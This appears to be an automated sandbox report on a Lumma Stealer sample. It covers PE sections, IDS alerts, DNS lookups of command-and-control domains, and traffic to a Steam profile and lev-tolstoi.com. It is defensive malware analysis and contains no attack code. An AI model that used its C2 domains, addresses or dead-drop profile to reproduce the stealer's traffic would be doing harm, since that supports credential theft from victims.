                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        0x10000x510000x248005a21068bf58553f118d889e877262bb1False0.9973913741438356data7.9812986672482875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .rsrc0x520000x1ac0x20075720b8ea60aa06a31806981b744f74eFalse0.5390625data5.245569576626531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        0x540000x29a0000x2006983879e0cfd0c88ac841f8db50d43e7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        mafhbcbe0x2ee0000x1930000x1924002ae3f3cd9ce3f91a85cf193eaf0a2fb1False0.9949235744251088data7.954300989744655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        qztbpyyk0x4810000x10000x400d785d6ea1487e50287754c57872b0c81False0.755859375data5.958532184557407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .taggant0x4820000x30000x22004db7646d65c6973eb52e78431c21a09dFalse0.07456341911764706DOS executable (COM)0.8392569671917797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_MANIFEST0x520580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        kernel32.dlllstrcpy

                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                        2024-12-23T08:54:19.829160+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.6537981.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-23T08:54:19.975155+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.6638601.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-23T08:54:20.294323+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.6638951.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-23T08:54:20.620674+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.6534481.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-23T08:54:20.870488+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.6531021.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-23T08:54:21.094658+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.6506541.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-23T08:54:21.321849+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.6533141.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-23T08:54:21.632866+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.6502751.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-23T08:54:21.858780+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.6504181.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-23T08:54:23.614149+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716104.102.49.254443TCP
                                                                                                                                                                                                                                        2024-12-23T08:54:24.399645+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.649716104.102.49.254443TCP
                                                                                                                                                                                                                                        2024-12-23T08:54:26.067424+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-23T08:54:26.821285+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649718104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-23T08:54:26.821285+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649718104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-23T08:54:27.799756+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724104.21.66.86443TCP

                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.226897955 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.226955891 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.227042913 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.230279922 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.230302095 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:23.614067078 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:23.614149094 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:23.690217972 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:23.690256119 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:23.690521002 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:23.736948013 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:23.750715017 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:23.791328907 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399687052 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399713039 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399760008 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399766922 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399780989 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399796009 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399810076 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399816036 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399827957 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399842024 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.399864912 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.598750114 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.598778009 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.598864079 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.598876953 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.598917961 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.606426001 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.606511116 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.613959074 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.614010096 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.614015102 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.614026070 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.614075899 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.615072012 CET49716443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.615083933 CET44349716104.102.49.254192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.848071098 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.848123074 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.848345995 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.848659992 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.848674059 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.067332029 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.067424059 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.084181070 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.084198952 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.084496021 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.085740089 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.085876942 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.085906029 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.821225882 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.821346998 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.821430922 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.841206074 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.841219902 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.841248989 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.841254950 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.914637089 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.914685011 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.914777994 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.915139914 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:26.915154934 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:27.799756050 CET49724443192.168.2.6104.21.66.86

                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:19.829159975 CET5379853192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:19.967328072 CET53537981.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:19.975155115 CET6386053192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.291740894 CET53638601.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.294322968 CET6389553192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.601126909 CET53638951.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.620673895 CET5344853192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.838310957 CET53534481.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.870487928 CET5310253192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.092684984 CET53531021.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.094657898 CET5065453192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.318711996 CET53506541.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.321849108 CET5331453192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.630456924 CET53533141.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.632865906 CET5027553192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.857142925 CET53502751.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.858779907 CET5041853192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.077496052 CET53504181.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.080123901 CET4946853192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.220633030 CET53494681.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.616899967 CET5548853192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.847043991 CET53554881.1.1.1192.168.2.6

                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:19.829159975 CET192.168.2.61.1.1.10x4819Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:19.975155115 CET192.168.2.61.1.1.10x3e4bStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.294322968 CET192.168.2.61.1.1.10xed51Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.620673895 CET192.168.2.61.1.1.10xf121Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.870487928 CET192.168.2.61.1.1.10xa04eStandard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.094657898 CET192.168.2.61.1.1.10xef7eStandard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.321849108 CET192.168.2.61.1.1.10xfd2bStandard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.632865906 CET192.168.2.61.1.1.10x33c7Standard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.858779907 CET192.168.2.61.1.1.10xee02Standard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.080123901 CET192.168.2.61.1.1.10x29a0Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.616899967 CET192.168.2.61.1.1.10x99e6Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:15.595391035 CET1.1.1.1192.168.2.60x3f08No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:15.595391035 CET1.1.1.1192.168.2.60x3f08No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:19.967328072 CET1.1.1.1192.168.2.60x4819Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.291740894 CET1.1.1.1192.168.2.60x3e4bName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.601126909 CET1.1.1.1192.168.2.60xed51Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:20.838310957 CET1.1.1.1192.168.2.60xf121Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.092684984 CET1.1.1.1192.168.2.60xa04eName error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.318711996 CET1.1.1.1192.168.2.60xef7eName error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.630456924 CET1.1.1.1192.168.2.60xfd2bName error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:21.857142925 CET1.1.1.1192.168.2.60x33c7Name error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.077496052 CET1.1.1.1192.168.2.60xee02Name error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.220633030 CET1.1.1.1192.168.2.60x29a0No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.867892981 CET1.1.1.1192.168.2.60x4129No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:22.867892981 CET1.1.1.1192.168.2.60x4129No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.847043991 CET1.1.1.1192.168.2.60x99e6No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:24.847043991 CET1.1.1.1192.168.2.60x99e6No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:34.022520065 CET1.1.1.1192.168.2.60xdcbdNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 23, 2024 08:54:34.022520065 CET1.1.1.1192.168.2.60xdcbdNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                        • lev-tolstoi.com

                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.649716104.102.49.2544437352C:\Users\user\Desktop\mgEXk8ip26.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-23 07:54:23 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                        2024-12-23 07:54:24 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:54:24 GMT
                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: sessionid=074167654f9fc98a8355926e; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                        2024-12-23 07:54:24 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                        2024-12-23 07:54:24 UTC16384INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                        2024-12-23 07:54:24 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22
                                                                                                                                                                                                                                        Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
                                                                                                                                                                                                                                        2024-12-23 07:54:24 UTC490INData Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74
